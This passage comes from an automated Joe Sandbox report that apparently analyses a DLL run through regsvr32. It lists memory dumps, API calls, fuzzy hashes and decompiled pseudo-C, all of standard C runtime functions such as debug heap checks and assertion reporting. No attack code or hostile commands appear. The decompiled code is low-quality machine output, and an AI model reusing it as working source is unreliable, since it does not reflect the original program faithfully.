                                                                                  • Part of subcall function 00007FFA52463D00: RtlEncodePointer.NTDLL ref: 00007FFA52463D06
                                                                                • _initp_misc_winsig.LIBCMTD ref: 00007FFA5246757B
                                                                                • _initp_eh_hooks.LIBCMTD ref: 00007FFA52467585
                                                                                  • Part of subcall function 00007FFA5246CF20: EncodePointer.KERNEL32(?,?,?,?,00007FFA5246758A,?,?,?,?,?,?,00007FFA52463D39), ref: 00007FFA5246CF30
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                                                • String ID:
                                                                                • API String ID: 2678799220-0
                                                                                • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                                • Instruction ID: e3a178054c10b367b528a24c8050abe3cbe8c90c3b0a34854669cd3b203055d7
                                                                                • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                                • Instruction Fuzzy Hash: 97E0E96791889185D524BB11EC5206A57B0BBC5B88F444131F6CD46ABFCE9CF9108A40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246ACA8 Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess$AllocateHeap__crt
                                                                                • String ID:
                                                                                • API String ID: 4215626177-0
                                                                                • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                                • Instruction ID: b1b13305f9e9e23a3f7190889e0675ce18bbc082a12c7696b1e08f915e011e97
                                                                                • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                                • Instruction Fuzzy Hash: EDE04F2190898683E624A715E81437A62F1FF86748F588036D64E02AA9CFADE440E600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52464399 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00007FFA7FFA52464399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {

				_a48 = __rax;
				if (_a48 == 0) goto 0x524643ad;
				goto 0x524643f5;
				if (_a88 != 0) goto 0x524643ce;
				if (_a120 == 0) goto 0x524643c7;
				 *_a120 = 0xc;
				goto 0x524643f5;
				if (E00007FFA7FFA5246ABB0(_a48, _a80) != 0) goto 0x524643f3;
				if (_a120 == 0) goto 0x524643ef;
				 *_a120 = 0xc;
				goto 0x524643f5;
				goto 0x52464377;
				return 0;
			}



                                                                                0x7ffa52464399
                                                                                0x7ffa524643a4
                                                                                0x7ffa524643ab
                                                                                0x7ffa524643b2
                                                                                0x7ffa524643ba
                                                                                0x7ffa524643c1
                                                                                0x7ffa524643cc
                                                                                0x7ffa524643da
                                                                                0x7ffa524643e2
                                                                                0x7ffa524643e9
                                                                                0x7ffa524643f1
                                                                                0x7ffa524643f3
                                                                                0x7ffa524643f9

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                                • Instruction ID: 0b05c921b644befdeb06e54c72c2c50201c10d975699b6b5fa9e1834da094ebe
                                                                                • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                                • Instruction Fuzzy Hash: 8001A82261C741C6EA609B15F84472AA7F0F785794F188131EA8E42AA8CFFCE4808B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246F4D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$ByteCharMultiUpdateUpdate::~_Wide
                                                                                • String ID:
                                                                                • API String ID: 2569699860-0
                                                                                • Opcode ID: 0c57b3b436687e78039d68963cfd06a068c3edb785e51800680b91c9a9ce0a07
                                                                                • Instruction ID: 98a37ed1223786f4b3595c37c66c6b708ad877743ae5b6dfda59a929dc97dd28
                                                                                • Opcode Fuzzy Hash: 0c57b3b436687e78039d68963cfd06a068c3edb785e51800680b91c9a9ce0a07
                                                                                • Instruction Fuzzy Hash: D801B072A187C08AC760DF10F48069AB7A1F7D9384F50812AEACD43B59CB3CE514CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52463471 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _ioterm
                                                                                • String ID:
                                                                                • API String ID: 4163092671-0
                                                                                • Opcode ID: c4661e6c861f00f368b387c53bfc5a2878f93a0c021545087ea26df979c33d88
                                                                                • Instruction ID: 34c0add8fd5378dbf56ee51c8c349fc5bd57afd514425de6b60a4f94f64b118f
                                                                                • Opcode Fuzzy Hash: c4661e6c861f00f368b387c53bfc5a2878f93a0c021545087ea26df979c33d88
                                                                                • Instruction Fuzzy Hash: 89F08C21C2C28399F369AB64EC0533969F0AF03B50F0CC274E02D818DECFECB8458A21
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52463433 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _ioterm.LIBCMTD ref: 00007FFA52463437
                                                                                  • Part of subcall function 00007FFA52467D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA5246343C), ref: 00007FFA52467D93
                                                                                  • Part of subcall function 00007FFA52463E00: FlsFree.KERNEL32 ref: 00007FFA52463E13
                                                                                  • Part of subcall function 00007FFA52463E00: _mtdeletelocks.LIBCMTD ref: 00007FFA52463E23
                                                                                  • Part of subcall function 00007FFA524688D0: HeapDestroy.KERNELBASE ref: 00007FFA524688DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                                                • String ID:
                                                                                • API String ID: 1508997487-0
                                                                                • Opcode ID: 8c7cd16c52d3f74447f8a2e4d1e0973512220e22c4a7d0e47614c04d6d0045ae
                                                                                • Instruction ID: 9f91e5cdff78de30267389c37e49c5ef5df9c8a38c5821d9c9768daed50533ff
                                                                                • Opcode Fuzzy Hash: 8c7cd16c52d3f74447f8a2e4d1e0973512220e22c4a7d0e47614c04d6d0045ae
                                                                                • Instruction Fuzzy Hash: 3DE01760E1C1439AF3096B60AC022B919F19F03B81F4CC430E10EC22DFEECCB8010265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524688D0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyHeap
                                                                                • String ID:
                                                                                • API String ID: 2435110975-0
                                                                                • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                                • Instruction ID: fcc5632f4c7c486cd64691234b421b0e32b55f99f7c51edf4a5e50edbc84cf03
                                                                                • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                                • Instruction Fuzzy Hash: CEC04C65D25E41D1E608E711FC8532422F06B96705F948030C51D016288FAD95968700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52463D00 Relevance: 1.5, APIs: 1, Instructions: 5COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID:
                                                                                • API String ID: 2118026453-0
                                                                                • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                                • Instruction ID: 146f7b81c00d896ce878741c0aad51f0c433fd68848a25f2d0d30132a6cbe3ea
                                                                                • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                                • Instruction Fuzzy Hash: B9A01120E22080A2CA0C33222C8202800A02B0A208EE00828C30F002088C2C82EA8A00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00007FFA52470215 Relevance: 89.7, APIs: 29, Strings: 22, Instructions: 441COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                                                                • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                                                                • API String ID: 4197005980-4190456261
                                                                                • Opcode ID: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                                • Instruction ID: d8ecc9a7044e005118e0bfad4d4bf094f6a50d29752a81e0893666371c22c8bf
                                                                                • Opcode Fuzzy Hash: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                                                • Instruction Fuzzy Hash: 4B42083191CA8695EB70CB54E8543EA63F1FB85344F488236D6AD42A9DDFBCE14ACB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524712E3 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 102libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                • API String ID: 2574300362-564504941
                                                                                • Opcode ID: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                                • Instruction ID: 010ee94f39955b91782510c016f4db19f7945676f3e0999e4be2c38d1f3ba03d
                                                                                • Opcode Fuzzy Hash: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                                • Instruction Fuzzy Hash: 3951D935919A82D6E754DB25FC4436973F0FB86B50F588035DAAE426ACDFBCE489CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524653FB Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 267memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 00007FFA524654F7, 00007FFA5246556D, 00007FFA524657FE
                                                                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FFA5246579F
                                                                                • _CrtIsValidHeapPointer(pUserData), xrefs: 00007FFA524654E2
                                                                                • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 00007FFA52465558
                                                                                • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 00007FFA524657E9
                                                                                • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 00007FFA5246542B
                                                                                • Client hook free failure., xrefs: 00007FFA524654A0
                                                                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFA5246573C
                                                                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFA52465620
                                                                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FFA52465683
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: HeapPointerValid_free_base
                                                                                • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                                                                • API String ID: 1656799702-182684663
                                                                                • Opcode ID: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                                • Instruction ID: 4e6eb6cae9d86284d48b64b2d6c98f5dffd4c0b7c3edbd98b0fbc87091dcf5f5
                                                                                • Opcode Fuzzy Hash: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                                                • Instruction Fuzzy Hash: F9C1B936628B8187EB20CB55E85072A77F1FB86794F144536EA9D43B98DFBCE410CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52463280 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 57%
                                                                                			E00007FFA7FFA52463280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
				void* _t7;
				void* _t10;
				signed long long _t15;
				signed long long* _t16;
				signed long long _t20;
				signed long long _t24;

				_t7 = __rcx -  *0x5248b018; // 0x6ebca90f5d98
				if (_t7 != 0) goto 0x5246329a;
				asm("dec eax");
				if ((__ecx & 0x0000ffff) != 0) goto 0x52463296;
				asm("repe ret");
				asm("dec eax");
				goto 0x52463720;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("o16 nop [eax+eax]");
				if (__r8 - 8 < 0) goto 0x5246330c;
				_t20 = __rdx * 0x1010101;
				_t10 = __r8 - 0x40;
				if (_t10 < 0) goto 0x524632ee;
				_t15 =  ~__rcx;
				if (_t10 == 0) goto 0x524632de;
				 *__rcx = _t20;
				_t16 = _t15 + __rcx;
				if (_t10 != 0) goto 0x52463327;
				_t24 = __r8 - _t15 & 7;
				if (_t10 == 0) goto 0x5246330c;
				 *_t16 = _t20;
				if (_t10 != 0) goto 0x52463300;
				if (_t24 == 0) goto 0x5246331b;
				_t16[1] = __edx & 0x000000ff;
				if (_t24 - 1 != 0) goto 0x52463311;
				return __eax;
			}









                                                                                0x7ffa52463280
                                                                                0x7ffa52463287
                                                                                0x7ffa52463289
                                                                                0x7ffa52463292
                                                                                0x7ffa52463294
                                                                                0x7ffa52463296
                                                                                0x7ffa5246329a
                                                                                0x7ffa5246329f
                                                                                0x7ffa524632a0
                                                                                0x7ffa524632a1
                                                                                0x7ffa524632a2
                                                                                0x7ffa524632a3
                                                                                0x7ffa524632a4
                                                                                0x7ffa524632a5
                                                                                0x7ffa524632a6
                                                                                0x7ffa524632b7
                                                                                0x7ffa524632c6
                                                                                0x7ffa524632ca
                                                                                0x7ffa524632ce
                                                                                0x7ffa524632d0
                                                                                0x7ffa524632d6
                                                                                0x7ffa524632db
                                                                                0x7ffa524632de
                                                                                0x7ffa524632ec
                                                                                0x7ffa524632f1
                                                                                0x7ffa524632f9
                                                                                0x7ffa52463300
                                                                                0x7ffa5246330a
                                                                                0x7ffa5246330f
                                                                                0x7ffa52463311
                                                                                0x7ffa52463319
                                                                                0x7ffa5246331b

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3778485334-0
                                                                                • Opcode ID: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                                • Instruction ID: 649d26f573c52adf3eeb1586b5f6f82416c9858fc22fec97712887ab2e802f33
                                                                                • Opcode Fuzzy Hash: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                                                • Instruction Fuzzy Hash: C731F736928B8296EB549B10FC4436A77F0FB46754F588035DAAD42B6DDFBCE088DB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246443C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _unlock
                                                                                • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                • API String ID: 2480363372-3680694803
                                                                                • Opcode ID: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                                • Instruction ID: 5e070d75834cf15295f1452b9439ee815f71ad003e49b73e539612ad72b3fe3d
                                                                                • Opcode Fuzzy Hash: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                                                • Instruction Fuzzy Hash: B4512031A186929AEB74CB24EC4176A73F4FB86354F188535D66D82B9DDFBCE4448B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246BE50 Relevance: 9.1, APIs: 6, Instructions: 79COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 33%
                                                                                			E00007FFA7FFA5246BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
				intOrPtr _v4;
				void* _v12;
				signed long long _v24;
				signed int _v36;
				long long _v180;
				long long _v184;
				intOrPtr _v192;
				char _v196;
				intOrPtr _v204;
				long _v212;
				long long _v220;
				long long _v228;
				long long _v1212;
				long long _v1308;
				char _v1460;
				char _v1476;
				char _v1484;
				int _v1492;
				long long _v1500;
				long long _v1508;
				long long _v1516;
				long long _v1524;
				long long _v1532;
				long long _v1540;
				void* _t51;
				signed long long _t80;
				long long _t85;
				void* _t100;

				_a24 = r8d;
				_a16 = __edx;
				_a8 = __ecx;
				_t80 =  *0x5248b018; // 0x6ebca90f5d98
				_v24 = _t80 ^ _t100 - 0x00000610;
				if (_a8 == 0xffffffff) goto 0x5246be8d;
				E00007FFA7FFA52468D90(_t51, _a8);
				_v184 = 0;
				memset(__edi, 0, 0x94 << 0);
				_v1508 =  &_v196;
				_v1500 =  &_v1460;
				_v1492 = 0;
